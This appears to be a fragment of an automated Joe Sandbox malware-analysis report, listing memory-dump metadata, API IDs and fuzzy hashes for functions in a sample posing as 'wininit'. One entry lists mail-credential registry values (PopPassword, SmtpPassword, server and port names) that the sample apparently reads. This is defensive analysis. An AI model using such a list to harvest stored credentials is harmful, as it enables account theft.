                                                  • VariantInit.OLEAUT32(?), ref: 00404431
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitVariant$AllocString$CreateInitializeInstance
                                                  • String ID:
                                                  • API String ID: 1312198159-0
                                                  • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                  • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                                  • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                  • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: QueryValue
                                                  • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                  • API String ID: 3660427363-2111798378
                                                  • Opcode ID: b68ba21e4a3a0049e44e4174c680ab59653fe0191a5276204f50c9857b9783d9
                                                  • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                                  • Opcode Fuzzy Hash: b68ba21e4a3a0049e44e4174c680ab59653fe0191a5276204f50c9857b9783d9
                                                  • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48